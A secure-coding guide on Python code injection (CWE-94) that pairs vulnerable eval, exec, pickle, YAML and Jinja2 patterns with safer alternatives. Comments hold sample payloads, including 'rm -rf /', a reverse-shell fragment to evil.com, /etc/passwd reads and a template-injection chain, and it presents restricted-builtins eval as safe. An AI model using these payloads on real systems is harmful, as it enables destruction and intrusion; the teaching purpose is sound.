CWE-94: Improper Control of Generation of Code (Code Injection) - Python

Overview

Code injection in Python occurs when untrusted input is passed to code execution functions like eval(), exec(), compile(), or __import__(). This allows attackers to execute arbitrary Python code with full access to the application's runtime environment, including file system, network, environment variables, imported modules, and all application data. Python's dynamic nature and powerful introspection capabilities make code injection particularly dangerous.

Primary Defence: Never use eval() or exec() with user input; use safe alternatives like ast.literal_eval() for evaluating literals, json.loads() for JSON data, or implement strict allowlists for any dynamic code evaluation, use sandboxed execution with restricted __builtins__ if code evaluation is absolutely necessary, and validate all input against strict patterns to prevent arbitrary code execution.

Common Vulnerable Patterns

eval() with User Input

# VULNERABLE - Direct eval of user input
def calculate(expression):
    result = eval(expression)  # NEVER DO THIS
    return result

# User input: "__import__('os').system('rm -rf /')"
# Executes arbitrary code!

Why this is vulnerable: eval() executes any Python expression. Attacker can import modules, call functions, access globals.

exec() with User Code

# VULNERABLE - Execute user-provided code
def run_user_script(code):
    exec(code)  # EXTREMELY DANGEROUS
    return "Script executed"

# User input: "import socket; s=socket.socket(); s.connect(('evil.com',1234)); ..."
# Reverse shell established!

Why this is vulnerable: exec() can execute multiple statements, imports, class definitions - full Python capabilities.

compile() and exec() Chain

# VULNERABLE - Compile and execute user code
def execute_formula(formula):
    compiled = compile(formula, '<string>', 'eval')
    result = eval(compiled)
    return result

# User input: "open('/etc/passwd').read()"
# Reads sensitive file

Why this is vulnerable: compile() + eval() provides same attack surface as direct eval().

Dynamic Module Import

import importlib

# VULNERABLE - Import user-specified module
def load_plugin(plugin_name):
    module = __import__(plugin_name)  # DANGEROUS
    return module

# Alternate dangerous approach
def load_module(module_name):
    module = importlib.import_module(module_name)  # DANGEROUS
    return module

# User input: "subprocess" or "os"
# Attacker can import any module and access dangerous functions

Why this is vulnerable: Allows importing arbitrary modules. Attacker can import os, subprocess, socket, etc.

Template Injection (Jinja2 Unsafe)

from jinja2 import Template

# VULNERABLE - User input in template without sandboxing
def render_greeting(name):
    template_str = f"Hello {{{{ {name} }}}}"
    template = Template(template_str)
    return template.render()

# User input: "''.__class__.__mro__[1].__subclasses__()[104].__init__.__globals__['sys'].modules['os'].system('whoami')"
# Executes system command via template injection!

Why this is vulnerable: Jinja2 templates can access Python objects. Attacker can traverse object hierarchy to reach dangerous functions.

Pickle Deserialization

import pickle

# VULNERABLE - Unpickle untrusted data
def load_user_data(data):
    obj = pickle.loads(data)  # CRITICAL VULNERABILITY
    return obj

# Attacker sends crafted pickle payload
# Arbitrary code executes during unpickling

Why this is vulnerable: Pickle can execute arbitrary code during deserialization via __reduce__ method.

YAML Unsafe Loading

import yaml

# VULNERABLE - Load YAML with arbitrary Python object execution
def load_config(yaml_str):
    config = yaml.load(yaml_str)  # DEPRECATED - DANGEROUS
    # or yaml.load(yaml_str, Loader=yaml.Loader)  # ALSO DANGEROUS
    return config

# User YAML input:
# !!python/object/apply:os.system ['whoami']
# Executes system command!

Why this is vulnerable: yaml.load() without Loader=yaml.SafeLoader can instantiate arbitrary Python objects.

Format String with User Globals Access

# VULNERABLE - Format string with untrusted format spec
def format_message(template, **kwargs):
    return template.format(**kwargs)

# User input template: "{user.__init__.__globals__[os].system('whoami')}"
# Can access dangerous objects through format spec

Why this is vulnerable: Format strings can access object attributes. Combined with __globals__, can reach dangerous modules.

Secure Patterns

SECURE: ast.literal_eval() for Safe Evaluation

import ast

# SECURE - Only allows Python literals (strings, numbers, tuples, lists, dicts, booleans, None)
def safe_calculate(expression):
    try:
        # Only evaluates literals - no function calls, no imports
        result = ast.literal_eval(expression)
        return result
    except (ValueError, SyntaxError):
        raise ValueError("Invalid expression")

# Safe inputs: "42", "3.14", "{'key': 'value'}", "[1, 2, 3]"
# Blocked: "__import__('os').system('whoami')" - raises ValueError

Why this works: ast.literal_eval() only parses Python literal structures (strings, numbers, tuples, lists, dicts, sets, booleans, None) - it cannot evaluate function calls, variable lookups, imports, or any executable code. The function parses the input into an AST (Abstract Syntax Tree) and verifies every node is a literal; if it finds anything else (function call, attribute access, operator), it raises ValueError. This makes it safe for deserializing simple data structures from untrusted input, such as config files or user-supplied parameters. Unlike eval(), which executes arbitrary Python code and can run __import__('os').system('rm -rf /'), ast.literal_eval() is strictly data-only. Use it for parsing lists, dicts, numbers, and strings when you control the format but not the content. For more complex deserialization, use json.loads() (even safer, only basic types).

SECURE: Restricted Expression Parser

import ast
import operator

# SECURE - Allowlist allowed operators
ALLOWED_OPS = {
    ast.Add: operator.add,
    ast.Sub: operator.sub,
    ast.Mult: operator.mul,
    ast.Div: operator.truediv,
    ast.Mod: operator.mod,
    ast.Pow: operator.pow,
    ast.USub: operator.neg,
}

ALLOWED_NODES = (ast.Expression, ast.Constant, ast.BinOp, ast.UnaryOp)

def safe_eval(expr):
    """Safely evaluate mathematical expressions only"""
    tree = ast.parse(expr, mode='eval')

    # Verify only allowed node types
    for node in ast.walk(tree):
        if not isinstance(node, ALLOWED_NODES):
            raise ValueError(f"Forbidden node type: {type(node).__name__}")
        if isinstance(node, ast.BinOp) and type(node.op) not in ALLOWED_OPS:
            raise ValueError(f"Forbidden operator: {type(node.op).__name__}")

    # Execute with restricted environment
    def eval_node(node):
        if isinstance(node, ast.Constant):
            return node.value
        elif isinstance(node, ast.BinOp):
            left = eval_node(node.left)
            right = eval_node(node.right)
            return ALLOWED_OPS[type(node.op)](left, right)
        elif isinstance(node, ast.UnaryOp):
            operand = eval_node(node.operand)
            return ALLOWED_OPS[type(node.op)](operand)
        else:
            raise ValueError(f"Unsupported node: {type(node).__name__}")

    return eval_node(tree.body)

# Usage
result = safe_eval("(10 + 5) * 2")  # 30
# safe_eval("__import__('os').system('whoami')")  # Raises ValueError

Why this works: This AST-based expression evaluator parses user input into an Abstract Syntax Tree and validates it against an allowlist of safe node types and operators before execution. The ast.parse() call converts the expression into a structured tree without executing it. By walking the AST and checking each node is in ALLOWED_NODES (only literals, binary ops, unary ops) and each operator is in ALLOWED_OPS (only basic arithmetic), you prevent function calls, imports, attribute access, and other dangerous operations. The custom eval_node() interpreter then safely evaluates only the allowed operations. This approach is far more secure than eval() because attackers cannot call __import__(), access __builtins__, or escape the sandbox. Use this pattern for calculators, formula evaluators, or any feature where users provide mathematical expressions. The allowlist is explicit and auditable; add only operations you've reviewed.

SECURE: Configuration-Driven Logic (Not Code)

import json

# SECURE - Use JSON configuration instead of code
def apply_pricing_rule(price, rule_config):
    """Apply pricing rules from JSON config, not executable code"""
    rule = json.loads(rule_config)

    # Declarative configuration
    if rule['type'] == 'percentage_discount':
        discount = price * (rule['percent'] / 100)
        return price - discount
    elif rule['type'] == 'fixed_discount':
        return price - rule['amount']
    elif rule['type'] == 'bulk_discount':
        if price > rule['threshold']:
            return price * (1 - rule['discount'])
        return price
    else:
        raise ValueError("Unknown rule type")

# Safe configuration (JSON, not code)
config = '{"type": "percentage_discount", "percent": 10}'
discounted = apply_pricing_rule(100, config)  # 90.0

# No code injection possible - only data configuration

Why this works: Using JSON for configuration instead of executable code eliminates code injection entirely. JSON is a data-only format - it can only represent basic types (objects, arrays, strings, numbers, booleans, null); it cannot contain functions, class instantiations, imports, or executable statements. When you parse JSON with json.loads(), you get pure Python data structures (dicts, lists, strings, numbers), not code. The business logic (if/elif conditions, calculations) lives in your trusted Python code, while user input only supplies data values (discount percentages, thresholds, amounts). This is the safest pattern for extensibility: users configure behavior through data, not by injecting code. Even if an attacker fully controls rule_config, they can only set field values, not execute commands or access the system. Use JSON config for pricing rules, workflows, plugins, feature flags - anywhere users customize behavior. Combine with schema validation (jsonschema) to enforce data structure and prevent logic errors.

SECURE: Jinja2 with Sandboxing

from jinja2.sandbox import SandboxedEnvironment

# SECURE - Use Jinja2 sandbox
env = SandboxedEnvironment()

def render_template(template_str, context):
    """Render templates in sandboxed environment"""
    template = env.from_string(template_str)
    return template.render(context)

# Usage
result = render_template("Hello {{ name }}!", {'name': 'Alice'})  # "Hello Alice!"

# Sandboxed - dangerous operations blocked
# template_str = "{{ ''.__class__.__mro__[1].__subclasses__() }}"
# Raises SecurityError

Why this works: Jinja2's SandboxedEnvironment restricts template access to dangerous Python features, preventing code injection through template strings. Unlike regular Jinja2 (which allows attribute access like {{''.__class__.__mro__}}), the sandbox blocks access to private attributes (those starting with _), sensitive methods (__subclasses__, __globals__), and dangerous builtins. Attackers often exploit template engines to escape into the Python runtime via attribute traversal; the sandbox prevents this by intercepting attribute lookups and rejecting unsafe ones. The sandbox also disables dangerous template tags and filters unless explicitly allowed. Use SandboxedEnvironment for any user-editable templates (email templates, report generators, CMS content). Never use regular Environment with untrusted templates. Combine with auto-escaping (enabled by default) to prevent XSS, and register only safe custom filters/functions. For even stricter control, consider a logic-less engine (Mustache, Handlebars) with no code execution.

SECURE: Safe YAML Loading

import yaml

# SECURE - Use SafeLoader to prevent arbitrary object instantiation
def load_config(yaml_str):
    config = yaml.safe_load(yaml_str)  # ALWAYS use safe_load
    return config

# Alternative explicit safe loader
def load_config_explicit(yaml_str):
    config = yaml.load(yaml_str, Loader=yaml.SafeLoader)
    return config

# Safe - only loads basic YAML types (strings, numbers, lists, dicts)
# Blocks: !!python/object/apply:os.system ['whoami']

Why this works: yaml.safe_load() only constructs simple Python objects (dict, list, str, int, float, bool, None) and blocks arbitrary object instantiation, preventing code execution via YAML deserialization. The unsafe yaml.load() (deprecated) can instantiate any Python class using YAML tags like !!python/object/apply:, allowing attackers to run os.system(), open files, or execute arbitrary code. safe_load() uses SafeLoader, which only recognizes basic YAML types and ignores dangerous tags. Always use safe_load() or explicitly pass Loader=yaml.SafeLoader when parsing untrusted YAML. This vulnerability (YAML deserialization) has caused major breaches; unsafe YAML loading is as dangerous as eval(). For configuration files you control, safe_load() is sufficient. If you need custom object loading, define explicit constructors with add_constructor() and validate fields, never use yaml.load() or UnsafeLoader.

SECURE: JSON for Serialization (Not Pickle)

import json

# SECURE - Use JSON instead of pickle
def save_user_data(data):
    serialized = json.dumps(data)
    return serialized

def load_user_data(serialized):
    data = json.loads(serialized)
    return data

# JSON only supports basic types - no code execution
# If complex objects needed, use explicit serialization methods

Why this works: JSON is a data-only format that cannot execute code during deserialization, while pickle can instantiate arbitrary Python objects and execute code via __reduce__ methods, making it dangerous for untrusted data. When you json.loads() a payload, you get only basic types (dicts, lists, strings, numbers); an attacker cannot trigger class constructors, import modules, or run commands. Pickle, by contrast, is designed to serialize entire Python object graphs, including class instances, and can call arbitrary code during unpickling. Attackers craft malicious pickle payloads that execute os.system(), open reverse shells, or exfiltrate data. Never unpickle untrusted data - use JSON for serialization. If you need complex objects, serialize them to JSON with explicit to_dict() methods and reconstruct them with constructors that validate fields. For internal, trusted use (caching, IPC between your own processes), pickle is acceptable with integrity checks (HMAC).

SECURE: Plugin System with Allowlist

import importlib

# SECURE - Allowlist allowed plugins
ALLOWED_PLUGINS = {
    'plugin_auth': 'myapp.plugins.auth',
    'plugin_reports': 'myapp.plugins.reports',
    'plugin_export': 'myapp.plugins.export'
}

def load_plugin(plugin_name):
    """Load plugin from allowlist only"""
    if plugin_name not in ALLOWED_PLUGINS:
        raise ValueError(f"Plugin '{plugin_name}' not allowed")

    module_path = ALLOWED_PLUGINS[plugin_name]
    module = importlib.import_module(module_path)
    return module

# Safe - only pre-approved plugins can be loaded
# load_plugin('os')  # Raises ValueError

Why this works: Allowlisting modules for dynamic imports prevents code injection by ensuring only pre-approved, safe modules can be loaded. When users control which modules to import (plugin systems, configurable imports), an attacker could import dangerous modules (os, subprocess, importlib) or malicious third-party packages to execute arbitrary code, read files, or compromise the system. By checking plugin_name against ALLOWED_PLUGINS before calling importlib.import_module(), you ensure only trusted, reviewed plugins are accessible. The allowlist maps user-facing plugin names to specific module paths you control, preventing path traversal or namespace pollution. This pattern is critical for plugin architectures. Store the allowlist server-side (never trust client input for module names), keep it minimal and audited, and review each plugin's code. For stronger isolation, load plugins in separate processes (multiprocessing) or containers. Combine with code signing or hash verification to detect tampering.

SECURE: Mathematical Expression Evaluator (sympy)

from sympy import sympify
from sympy.parsing.sympy_parser import parse_expr, standard_transformations, implicit_multiplication_application

# SECURE - Use sympy for mathematical expressions
def safe_math_eval(expr_str):
    """Safely evaluate mathematical expressions"""
    try:
        transformations = (standard_transformations + (implicit_multiplication_application,))
        expr = parse_expr(expr_str, transformations=transformations)
        result = expr.evalf()
        return float(result)
    except Exception as e:
        raise ValueError(f"Invalid mathematical expression: {e}")

# Safe mathematical evaluation
result = safe_math_eval("2*pi + sqrt(16)")  # Works
# safe_math_eval("__import__('os')")  # Raises ValueError

Why this works: sympy provides a mathematical expression parser that only evaluates math operations (arithmetic, algebra, calculus, constants like pi), not arbitrary Python code. Unlike eval(), which executes any Python and can call __import__('os').system('rm -rf /'), parse_expr() parses symbolic math expressions into a safe AST and evaluates them numerically. Attempts to call functions outside sympy's math namespace (imports, attribute access, builtins) raise exceptions. The parser is isolated from the Python runtime, so attackers cannot escape to execute code or access the file system. Use sympy for calculators, graphing tools, scientific computing features, or any math input. The library handles complex expressions, variables, and functions (sin, cos, sqrt, integrals) safely. For simple arithmetic, the AST-based evaluator shown earlier is lighter; use sympy when you need symbolic math capabilities. Always wrap in try/except and set evaluation limits (timeout, recursion depth) to prevent DoS.

Key Security Functions

AST-based Expression Validator

import ast

def validate_safe_expression(expr_str):
    """Validate expression only contains safe operations"""
    try:
        tree = ast.parse(expr_str, mode='eval')
    except SyntaxError:
        raise ValueError("Invalid Python syntax")

    # Define allowed node types
    SAFE_NODES = (
        ast.Expression, ast.Constant, ast.Num, ast.Str,  # ast.Num, ast.Str for Python < 3.8
        ast.BinOp, ast.UnaryOp, ast.Compare,
        ast.List, ast.Tuple, ast.Dict,
        ast.Add, ast.Sub, ast.Mult, ast.Div, ast.Mod, ast.Pow,
        ast.Eq, ast.NotEq, ast.Lt, ast.LtE, ast.Gt, ast.GtE,
        ast.USub, ast.UAdd
    )

    for node in ast.walk(tree):
        if not isinstance(node, SAFE_NODES):
            raise ValueError(f"Forbidden operation: {type(node).__name__}")

    return True

# Usage
validate_safe_expression("(10 + 5) * 2")  # OK
# validate_safe_expression("__import__('os')")  # Raises ValueError

Sandboxed Execution Environment

def sandboxed_eval(expr, allowed_builtins=None):
    """Execute expression in restricted environment"""
    if allowed_builtins is None:
        allowed_builtins = {
            'abs': abs, 'min': min, 'max': max, 'len': len,
            'sum': sum, 'round': round, 'sorted': sorted
        }

    # Empty global and local namespaces
    safe_globals = {
        '__builtins__': allowed_builtins
    }
    safe_locals = {}

    try:
        result = eval(expr, safe_globals, safe_locals)
        return result
    except Exception as e:
        raise ValueError(f"Evaluation error: {e}")

# Usage
result = sandboxed_eval("abs(-5) + max([1,2,3])")  # 8
# sandboxed_eval("open('/etc/passwd').read()")  # NameError: name 'open' is not defined

Plugin Signature Verification

import hashlib
import hmac

PLUGIN_SECRET = b'your-secret-key-here'  # From environment variable

def verify_plugin_signature(plugin_code, signature):
    """Verify plugin hasn't been tampered with"""
    expected_sig = hmac.new(PLUGIN_SECRET, plugin_code.encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected_sig, signature)

def load_verified_plugin(plugin_code, signature):
    """Only load plugins with valid signature"""
    if not verify_plugin_signature(plugin_code, signature):
        raise ValueError("Invalid plugin signature")

    # Even with verification, execute in restricted environment
    safe_globals = {'__builtins__': {}}
    exec(plugin_code, safe_globals)
    return safe_globals

Verification

After implementing the recommended secure patterns, verify the fix through multiple approaches:

Manual testing: Submit malicious payloads relevant to this vulnerability and confirm they're handled safely without executing unintended operations
Code review: Confirm all instances use the secure pattern (parameterized queries, safe APIs, proper encoding) with no string concatenation or unsafe operations
Static analysis: Use security scanners to verify no new vulnerabilities exist and the original finding is resolved
Regression testing: Ensure legitimate user inputs and application workflows continue to function correctly
Edge case validation: Test with special characters, boundary conditions, and unusual inputs to verify proper handling
Framework verification: If using a framework or library, confirm the recommended APIs are used correctly according to documentation
Authentication/session testing: Verify security controls remain effective and cannot be bypassed (if applicable to the vulnerability type)
Rescan: Run the security scanner again to confirm the finding is resolved and no new issues were introduced

Analysis Steps

Locate the eval/exec Call:

# Line 42 in app/calculator.py
result = eval(user_expression)  # VULNERABLE

Trace Input Source:

Web form? request.form['expression']
API endpoint? request.json['code']
File upload? Reading file contents
Database? User-stored formulas

Assess Execution Context:

What can injected code access? (All Python modules, file system, network)
What privileges does application run with? (Web server user, database access)
What data is accessible? (User data, secrets in environment variables)

Determine Safe Alternative:

Mathematical expressions → Use ast.literal_eval() or sympy
Configuration → Use JSON/YAML with safe_load()
Business rules → Use rule engine or declarative config
Plugin system → Use allowlist + signature verification

Remediation for Scanner Finding

Step 1: Identify the purpose

# BEFORE (Line 42 - vulnerable)
def calculate(user_expression):
    result = eval(user_expression)  # User wants to calculate "2 + 2"
    return result

Step 2: Replace with safe alternative

# AFTER (fixed with ast.literal_eval for simple cases)
import ast

def calculate(user_expression):
    try:
        # Only allows Python literals and basic operations
        result = ast.literal_eval(user_expression)
        return result
    except (ValueError, SyntaxError):
        raise ValueError("Invalid expression")

# Or for more complex math:
from sympy import sympify

def calculate_math(user_expression):
    try:
        expr = sympify(user_expression)
        result = expr.evalf()
        return float(result)
    except Exception:
        raise ValueError("Invalid mathematical expression")

Step 3: Add input validation

import re

def validate_math_expression(expr):
    """Additional validation layer"""
    # Max length
    if len(expr) > 200:
        raise ValueError("Expression too long")

    # Only allow safe characters
    if not re.match(r'^[0-9+\-*/().\s]+$', expr):
        raise ValueError("Invalid characters in expression")

    # Deny dangerous keywords
    forbidden = ['import', 'exec', 'eval', 'compile', 'open', '__']
    for word in forbidden:
        if word in expr.lower():
            raise ValueError("Forbidden keyword in expression")

    return True

def safe_calculate(user_expression):
    validate_math_expression(user_expression)
    result = ast.literal_eval(user_expression)
    return result

Common Scanner False Positives

False Positive: eval() with Hardcoded String

# May be flagged but is safe if input is truly hardcoded
config = eval("{'setting': True}")  # Hardcoded, not from user

# Better: Use ast.literal_eval anyway for defense-in-depth
config = ast.literal_eval("{'setting': True}")

Verification

After remediation:

No eval(), exec(), compile() with user input
No __import__() or importlib.import_module() with user strings
Templates use SandboxedEnvironment (Jinja2)
YAML uses yaml.safe_load() (not yaml.load())
Deserialization uses JSON (not pickle)
Scanner re-scan shows finding resolved
Tested with code injection payloads (blocked)

CWE-94: Improper Control of Generation of Code (Code Injection) - Python

Overview

Common Vulnerable Patterns

eval() with User Input

exec() with User Code

compile() and exec() Chain

Dynamic Module Import

Template Injection (Jinja2 Unsafe)

Pickle Deserialization

YAML Unsafe Loading

Format String with User Globals Access

Secure Patterns

SECURE: ast.literal_eval() for Safe Evaluation

SECURE: Restricted Expression Parser

SECURE: Configuration-Driven Logic (Not Code)

SECURE: Jinja2 with Sandboxing

SECURE: Safe YAML Loading

SECURE: JSON for Serialization (Not Pickle)

SECURE: Plugin System with Allowlist

SECURE: Mathematical Expression Evaluator (sympy)

Key Security Functions

AST-based Expression Validator

Sandboxed Execution Environment

Plugin Signature Verification

Verification

Analysis Steps

Remediation for Scanner Finding

Common Scanner False Positives

Verification

Security Checklist

Additional Resources